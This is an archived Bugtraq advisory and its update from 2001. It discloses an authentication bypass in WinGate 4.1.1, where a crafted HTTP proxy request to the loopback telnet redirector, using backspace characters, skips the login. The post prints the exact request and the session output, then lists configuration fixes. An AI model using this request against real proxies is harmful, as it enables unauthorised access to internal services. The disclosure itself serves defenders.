Bugtraq mailing list archives
Wingate 4.1.1, new year 's bug: UPDATE
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Thu, 25 Jan 2001 22:15:11 -0000
Hi, I posted the mail below to bugtraq few days ago describing a somewhat weird bug into wingate 4.1.1 (last release) that allow to bypass all authentication/wrapper mechanism in the software. Further tests later, i think to know why. When you configure a proxy service in the properties window, u have to choose, among others, your binding/Interfaces/Policy settings. These three are very important for your safety. The first determine which interface connections are allowed to come from. Second, to wich one, they should be sent. Third one determine your per user policy. By default, bindings settings come with "Allow connections coming in on any interface" checked wich include loopback 127.0.0.1. THE FLAW IS HERE !! When connecting to my telnet redirector (port 23 with only one user "admin" allowed), i'm prompted for login/password but when connecting directly from loopback (on the proxy host), no authentication at all ! Alles klar , if users can use the http proxy they can use loopback and redirecor too to bypass authentication/IP wrapper for others services. Like i described it in the previous post. For example: #telnet wingate_ip 80 GET http://127.0.0.1:23/ I changed my TELNET PROXY bindings settings with "Connections will be accepted from the following interface only xxx.xxx.xxx.xxx" ( i mean anything else than loopback ). I was unable to do a bounce attack anymore even trying GET http://xxx.xxx.xxx.xxx:23 It seems to be a BUG in the security scheme used by wingate that trust that anything coming from 127.0.0.1 is already authenticated. If u look at "advanced options" in the Options menu, we will find that default configuration trust any interface, u can't disable trusting of 127.0.0.1 (at least not with an eval version). May be disable this would make the job. My second advise in my post was 2/ Remove your services default binding to 127.0.0.1, when u don't use a service at all, suppress all its instance. Now i would say 2/ ALWAYS Remove your services default binding to 127.0.0.1 (Never use loopback), just use the IP address your really need !. Have a nice day, =================================== Gregory Duchemin -- Security consultant NEUROCOM CANADA 1001 bd maisonneuve Ouest, suite 200 Montreal, Quebec, H3A 3C8 Canada c3rb3r () hotmail com ======= hi bugtraqers wingate 4.1.1 is once again vulnerable cause ( once again !) of a too permissive redirector engine (tested with version pro eval on NT server 4.0) It's usual to say redirector services like telnet and ftp at least, should be granted to only few people (authentication) and binded only on private interface ( binding configuration ) while accepting connections from some specific network/ip ( wrapping ). Nevertheless, most of the time, http proxies, even binded only on a private segment, are granted for all employees, for a public usage. There is a way to abuse wingate services authentication/wrapper/binding schemes simply by using the http proxy. Any user allowed to connect the proxy should be able to use any of UP wingate services. For instance, if u create an admin account, allowed to use your telnet and ftp services, while discarding all other users, u'll be ask for username/password authentication next time u connect to these ports (NT scheme or wingate one depending what u choosed). weather is clear. Now, if u connect to the web proxy port and craft a special request for the local telnet service while using ctrl-H chars, u will be able to bypass twice policy (authentication) and IP wrapper (binding conf) leading in remotely forcing wingate to open a telnet,ftp,whatever... connexion to any other host, potentialy even from outside to inside the corporate network if http proxy is reachable from outside (However, it was already a bad idea before this bug). If u don't use telnet, ftp, whatever services but have let them binded on loopback ( default configuration ), u r vulnerable. Take a look at that: #telnet 10.0.0.1 Trying 10.0.0.1... Connected to 10.0.0.1. Escaped character is ^] Login: Telnet redirector asks for a credential. Till now, everything looks quiet. And now.... #telnet 10.0.0.1 80 Trying 10.0.0.1... Connected to 10.0.0.1. Escaped character is ^] GET http://127.0.0.1:23/H3ll WinGate> GET /H3ll Connecting to host GET.....Host name lookup 'GET' Failed HTTP/1.0 Connecting to host....Socket error blahblahblah........ Great ! we catch a wingate telnet prompt : WinGate > Telnet even tried to connect to "GET /H3ll" ! May be we could forge a good request (a valid hostname/ip). Let's try something with ^H (this old friend ;) ) #telnet 10.0.0.1 80 Trying 10.0.0.1... Connected to 10.0.0.1. Escaped character is ^] GET^H^H^H http://127.0.0.1:23/^H^H127.0.0.1 3 ^H for GET, 2 more for / and ' ' WInGate>127.0.0.1 Connecting to host 127.0.0.1...Connected Connection terminated by remote host Connection closed by foreign host It's OK !...connection was established between telnet and pop3 services It's possible to jump from service to service inside wingate bypassing every authentication systems. Each connection is present in the logging window but if u look more carrefully in the telnet session properties u will see that we were telnet authenticated as administrator (the mere user allowed in the conf)without any password and from 127.0.0.1 ;) really funny ! Conclusion: 1/ never grant access from outside your corporate network, specially http proxy service. Allowing this would make all your private network vulnerable from Internet, anybody would be able to pass through your proxy and thus potentialy to reach office servers through other wingate services. Nothing really new 2/ Remove your services default binding to 127.0.0.1, when u don't use a service at all, suppress all its instance. 3/ never use telnet service, too weak, too dangerous. Even with all the security rules above, users from inside your network may be still able to use http proxy as a redirector toward any others hosts/services. 4/ in the www proxy interface configuration, choose the right interface for outbound connection to prevent any redirection, and so, any attack in your network. I did not see any configuration option to, at least, fix a port range inside all http proxy requests. It would be a nice idea. I suppose things are quiet similar by using ftp to reach http,pop,telnet,.. and so on. Any thoughts ? Have a nice day =================================== Gregory Duchemin -- Security consultant NEUROCOM CANADA 1001 bd maisonneuve Ouest, suite 200 Montreal, Quebec, H3A 3C8 Canada c3rb3r () hotmail com _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Current thread:
- Wingate 4.1.1, new year 's bug: UPDATE gregory duchemin (Jan 26)